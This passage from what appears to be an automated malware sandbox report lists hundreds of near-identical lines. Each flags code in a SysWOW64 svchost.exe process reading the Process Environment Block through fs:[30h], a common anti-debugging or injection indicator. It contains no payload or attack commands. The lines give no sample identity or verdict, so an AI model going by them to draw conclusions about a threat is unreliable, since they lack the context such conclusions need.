Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h] 2_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h] 2_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h] 2_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h] 2_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0382A020 mov eax, dword ptr fs:[00000030h] 2_2_0382A020
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0382C020 mov eax, dword ptr fs:[00000030h] 2_2_0382C020
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038C6030 mov eax, dword ptr fs:[00000030h] 2_2_038C6030
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03832050 mov eax, dword ptr fs:[00000030h] 2_2_03832050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B6050 mov eax, dword ptr fs:[00000030h] 2_2_038B6050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0385C073 mov eax, dword ptr fs:[00000030h] 2_2_0385C073
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038D678E mov eax, dword ptr fs:[00000030h] 2_2_038D678E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038307AF mov eax, dword ptr fs:[00000030h] 2_2_038307AF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038E47A0 mov eax, dword ptr fs:[00000030h] 2_2_038E47A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0383C7C0 mov eax, dword ptr fs:[00000030h] 2_2_0383C7C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B07C3 mov eax, dword ptr fs:[00000030h] 2_2_038B07C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038527ED mov eax, dword ptr fs:[00000030h] 2_2_038527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038527ED mov eax, dword ptr fs:[00000030h] 2_2_038527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038527ED mov eax, dword ptr fs:[00000030h] 2_2_038527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038BE7E1 mov eax, dword ptr fs:[00000030h] 2_2_038BE7E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038347FB mov eax, dword ptr fs:[00000030h] 2_2_038347FB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038347FB mov eax, dword ptr fs:[00000030h] 2_2_038347FB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386C700 mov eax, dword ptr fs:[00000030h] 2_2_0386C700
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03830710 mov eax, dword ptr fs:[00000030h] 2_2_03830710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03860710 mov eax, dword ptr fs:[00000030h] 2_2_03860710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386C720 mov eax, dword ptr fs:[00000030h] 2_2_0386C720
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386C720 mov eax, dword ptr fs:[00000030h] 2_2_0386C720
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386273C mov eax, dword ptr fs:[00000030h] 2_2_0386273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386273C mov ecx, dword ptr fs:[00000030h] 2_2_0386273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386273C mov eax, dword ptr fs:[00000030h] 2_2_0386273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038AC730 mov eax, dword ptr fs:[00000030h] 2_2_038AC730
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386674D mov esi, dword ptr fs:[00000030h] 2_2_0386674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386674D mov eax, dword ptr fs:[00000030h] 2_2_0386674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386674D mov eax, dword ptr fs:[00000030h] 2_2_0386674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03830750 mov eax, dword ptr fs:[00000030h] 2_2_03830750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038BE75D mov eax, dword ptr fs:[00000030h] 2_2_038BE75D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03872750 mov eax, dword ptr fs:[00000030h] 2_2_03872750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03872750 mov eax, dword ptr fs:[00000030h] 2_2_03872750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B4755 mov eax, dword ptr fs:[00000030h] 2_2_038B4755
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03838770 mov eax, dword ptr fs:[00000030h] 2_2_03838770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h] 2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h] 2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h] 2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h] 2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h] 2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h] 2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h] 2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h] 2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h] 2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h] 2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h] 2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h] 2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03834690 mov eax, dword ptr fs:[00000030h] 2_2_03834690
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03834690 mov eax, dword ptr fs:[00000030h] 2_2_03834690
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386C6A6 mov eax, dword ptr fs:[00000030h] 2_2_0386C6A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038666B0 mov eax, dword ptr fs:[00000030h] 2_2_038666B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386A6C7 mov ebx, dword ptr fs:[00000030h] 2_2_0386A6C7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386A6C7 mov eax, dword ptr fs:[00000030h] 2_2_0386A6C7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h] 2_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h] 2_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h] 2_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h] 2_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B06F1 mov eax, dword ptr fs:[00000030h] 2_2_038B06F1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B06F1 mov eax, dword ptr fs:[00000030h] 2_2_038B06F1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038AE609 mov eax, dword ptr fs:[00000030h] 2_2_038AE609
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h] 2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h] 2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h] 2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h] 2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h] 2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h] 2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h] 2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03872619 mov eax, dword ptr fs:[00000030h] 2_2_03872619
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0384E627 mov eax, dword ptr fs:[00000030h] 2_2_0384E627
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03866620 mov eax, dword ptr fs:[00000030h] 2_2_03866620
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03868620 mov eax, dword ptr fs:[00000030h] 2_2_03868620
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0383262C mov eax, dword ptr fs:[00000030h] 2_2_0383262C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0384C640 mov eax, dword ptr fs:[00000030h] 2_2_0384C640
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038F866E mov eax, dword ptr fs:[00000030h] 2_2_038F866E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038F866E mov eax, dword ptr fs:[00000030h] 2_2_038F866E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386A660 mov eax, dword ptr fs:[00000030h] 2_2_0386A660
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386A660 mov eax, dword ptr fs:[00000030h] 2_2_0386A660
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03862674 mov eax, dword ptr fs:[00000030h] 2_2_03862674
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03832582 mov eax, dword ptr fs:[00000030h] 2_2_03832582
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03832582 mov ecx, dword ptr fs:[00000030h] 2_2_03832582
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03864588 mov eax, dword ptr fs:[00000030h] 2_2_03864588
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386E59C mov eax, dword ptr fs:[00000030h] 2_2_0386E59C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h] 2_2_038B05A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h] 2_2_038B05A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h] 2_2_038B05A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038545B1 mov eax, dword ptr fs:[00000030h] 2_2_038545B1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038545B1 mov eax, dword ptr fs:[00000030h] 2_2_038545B1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386E5CF mov eax, dword ptr fs:[00000030h] 2_2_0386E5CF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386E5CF mov eax, dword ptr fs:[00000030h] 2_2_0386E5CF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038365D0 mov eax, dword ptr fs:[00000030h] 2_2_038365D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386A5D0 mov eax, dword ptr fs:[00000030h] 2_2_0386A5D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386A5D0 mov eax, dword ptr fs:[00000030h] 2_2_0386A5D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038325E0 mov eax, dword ptr fs:[00000030h] 2_2_038325E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386C5ED mov eax, dword ptr fs:[00000030h] 2_2_0386C5ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386C5ED mov eax, dword ptr fs:[00000030h] 2_2_0386C5ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038C6500 mov eax, dword ptr fs:[00000030h] 2_2_038C6500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h] 2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h] 2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h] 2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h] 2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h] 2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h] 2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h] 2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03840535 mov eax, dword ptr fs:[00000030h] 2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03840535 mov eax, dword ptr fs:[00000030h] 2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03840535 mov eax, dword ptr fs:[00000030h] 2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03840535 mov eax, dword ptr fs:[00000030h] 2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03840535 mov eax, dword ptr fs:[00000030h] 2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03840535 mov eax, dword ptr fs:[00000030h] 2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h] 2_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h] 2_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h] 2_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h] 2_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h] 2_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03838550 mov eax, dword ptr fs:[00000030h] 2_2_03838550
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03838550 mov eax, dword ptr fs:[00000030h] 2_2_03838550
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386656A mov eax, dword ptr fs:[00000030h] 2_2_0386656A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386656A mov eax, dword ptr fs:[00000030h] 2_2_0386656A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386656A mov eax, dword ptr fs:[00000030h] 2_2_0386656A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038EA49A mov eax, dword ptr fs:[00000030h] 2_2_038EA49A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038364AB mov eax, dword ptr fs:[00000030h] 2_2_038364AB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038644B0 mov ecx, dword ptr fs:[00000030h] 2_2_038644B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038BA4B0 mov eax, dword ptr fs:[00000030h] 2_2_038BA4B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038304E5 mov ecx, dword ptr fs:[00000030h] 2_2_038304E5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03868402 mov eax, dword ptr fs:[00000030h] 2_2_03868402
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03868402 mov eax, dword ptr fs:[00000030h] 2_2_03868402
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03868402 mov eax, dword ptr fs:[00000030h] 2_2_03868402
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h] 2_2_0382E420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h] 2_2_0382E420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h] 2_2_0382E420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0382C427 mov eax, dword ptr fs:[00000030h] 2_2_0382C427
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h] 2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h] 2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h] 2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h] 2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h] 2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h] 2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h] 2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386A430 mov eax, dword ptr fs:[00000030h] 2_2_0386A430
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h] 2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h] 2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h] 2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h] 2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h] 2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h] 2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h] 2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h] 2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038EA456 mov eax, dword ptr fs:[00000030h] 2_2_038EA456
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0382645D mov eax, dword ptr fs:[00000030h] 2_2_0382645D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0385245A mov eax, dword ptr fs:[00000030h] 2_2_0385245A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038BC460 mov ecx, dword ptr fs:[00000030h] 2_2_038BC460
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h] 2_2_0385A470
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h] 2_2_0385A470
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h] 2_2_0385A470
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03840BBE mov eax, dword ptr fs:[00000030h] 2_2_03840BBE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03840BBE mov eax, dword ptr fs:[00000030h] 2_2_03840BBE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038E4BB0 mov eax, dword ptr fs:[00000030h] 2_2_038E4BB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038E4BB0 mov eax, dword ptr fs:[00000030h] 2_2_038E4BB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h] 2_2_03850BCB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h] 2_2_03850BCB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h] 2_2_03850BCB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h] 2_2_03830BCD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h] 2_2_03830BCD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h] 2_2_03830BCD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038DEBD0 mov eax, dword ptr fs:[00000030h] 2_2_038DEBD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h] 2_2_03838BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h] 2_2_03838BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h] 2_2_03838BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0385EBFC mov eax, dword ptr fs:[00000030h] 2_2_0385EBFC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038BCBF0 mov eax, dword ptr fs:[00000030h] 2_2_038BCBF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03904B00 mov eax, dword ptr fs:[00000030h] 2_2_03904B00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h] 2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h] 2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h] 2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h] 2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h] 2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h] 2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h] 2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h] 2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h] 2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0385EB20 mov eax, dword ptr fs:[00000030h] 2_2_0385EB20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0385EB20 mov eax, dword ptr fs:[00000030h] 2_2_0385EB20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038F8B28 mov eax, dword ptr fs:[00000030h] 2_2_038F8B28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038F8B28 mov eax, dword ptr fs:[00000030h] 2_2_038F8B28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038E4B4B mov eax, dword ptr fs:[00000030h] 2_2_038E4B4B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038E4B4B mov eax, dword ptr fs:[00000030h] 2_2_038E4B4B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h] 2_2_03902B57
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h] 2_2_03902B57
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h] 2_2_03902B57
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h] 2_2_03902B57
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038C6B40 mov eax, dword ptr fs:[00000030h] 2_2_038C6B40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038C6B40 mov eax, dword ptr fs:[00000030h] 2_2_038C6B40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038FAB40 mov eax, dword ptr fs:[00000030h] 2_2_038FAB40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038D8B42 mov eax, dword ptr fs:[00000030h] 2_2_038D8B42
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03828B50 mov eax, dword ptr fs:[00000030h] 2_2_03828B50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038DEB50 mov eax, dword ptr fs:[00000030h] 2_2_038DEB50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0382CB7E mov eax, dword ptr fs:[00000030h] 2_2_0382CB7E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h] 2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h] 2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h] 2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h] 2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h] 2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h] 2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h] 2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h] 2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h] 2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03904A80 mov eax, dword ptr fs:[00000030h] 2_2_03904A80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03868A90 mov edx, dword ptr fs:[00000030h] 2_2_03868A90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03838AA0 mov eax, dword ptr fs:[00000030h] 2_2_03838AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03838AA0 mov eax, dword ptr fs:[00000030h] 2_2_03838AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03886AA4 mov eax, dword ptr fs:[00000030h] 2_2_03886AA4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h] 2_2_03886ACC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h] 2_2_03886ACC
